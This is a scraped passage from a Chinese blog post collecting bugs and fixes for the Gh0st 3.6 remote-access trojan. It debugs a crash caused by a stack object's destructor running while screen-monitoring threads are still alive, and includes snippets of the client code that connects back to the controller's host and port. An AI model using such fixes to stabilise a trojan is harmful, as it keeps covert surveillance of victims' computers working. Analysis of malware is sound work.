5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li></ul>

此時執(zhí)行到的指令位置是 5950CC6F

對應(yīng)的源代碼是

<code class="language-C hljs r has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">int CManager::Send(LPBYTE lpData, UINT nSize) { int nRet = 0; try { nRet = m_pClient->Send((LPBYTE)lpData, nSize); }catch(...){}; return nRet; }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li></ul>

寄存器edx的數(shù)值是?edx 0x02ecfca0 unsigned long

??奇怪的是在關(guān)閉遠(yuǎn)程桌面以前這個函數(shù)執(zhí)行了很多次，都沒有出現(xiàn)這個問題。現(xiàn)在在關(guān)閉遠(yuǎn)程桌面之后就這樣。通過對比發(fā)現(xiàn) 出現(xiàn)訪問異常的內(nèi)存在關(guān)閉遠(yuǎn)程桌面之后數(shù)值出現(xiàn)了變化。

可以在關(guān)閉遠(yuǎn)程桌面之后 vs2010下內(nèi)存訪問斷點，edx + 4 的位置

此時按F5發(fā)現(xiàn)中斷在manager類的析構(gòu)函數(shù)里面：

<code class="language-C hljs mathematica has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">CManager::~CManager() { CloseHandle(m_hEventDlgOpen); }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li></ul>

再看堆棧窗口是從 Loop_ScreenManager 函數(shù)結(jié)尾調(diào)用而來的：

<code class="language-C hljs lasso has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">DWORD WINAPI Loop_ScreenManager(SOCKET sRemote) { CClientSocket socketClient; if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort)) return -1; CScreenManager manager(&socketClient); socketClient.run_event_loop(); return 0; }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li><li style="box-sizing: border-box; padding: 0px 5px;">10</li><li style="box-sizing: border-box; padding: 0px 5px;">11</li><li style="box-sizing: border-box; padding: 0px 5px;">12</li></ul>

??這樣就大概分析出執(zhí)行流程：

??在上面函數(shù)中定義了一個CScreenManager類的對象manager，這個對象在棧中。CScreenManager基類是 CManager?
當(dāng)在主控端把遠(yuǎn)程桌面關(guān)閉之后run_event_loop 會返回，這樣這個函數(shù)也就返回了，對象manager也就開始調(diào)用自己的析構(gòu)函數(shù)，以前能訪問的現(xiàn)在也就不能訪問了。所以就會出現(xiàn)上面的問題。

??其實在運行的時候CScreenManager類的構(gòu)造函數(shù)中創(chuàng)建了2個線程ControlThread ，WorkThread,當(dāng)正常運行沒有調(diào)試器中斷的時候當(dāng)函數(shù) Loop_ScreenManager 執(zhí)行完之后ControlThread 這個線程還未完全退出，不知道這樣會產(chǎn)生什么意外后果？？

??經(jīng)過試驗在函數(shù) Loop_ScreenManager結(jié)束之前加入 sleep(20) 可以解決這個問題。

------------------------------------------------------------------------------------------------------------------------------------

未完待續(xù)。。。

總結(jié)

以上是生活随笔為你收集整理的Gh0st 3.6 存在的BUG及修改方法（收集整理）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

上一篇：论OD最原始的用途------找程序BU
下一篇： gh0st源码分析：屏幕监控

编程问答

Gh0st 3.6 存在的BUG及修改方法（收集整理）

8.SetPaneText 的崩潰問題

------------------------------------------------------------------------------------------------------------------------------------

9.WSAIoctl 參數(shù)類型導(dǎo)致棧異常

--------------------------------------------------------------------------------------------------------------------------------- 11.棧上對象多線程，析構(gòu)函數(shù)導(dǎo)致程序崩潰

總結(jié)

---------------------------------------------------------------------------------------------------------------------------------

11.棧上對象多線程，析構(gòu)函數(shù)導(dǎo)致程序崩潰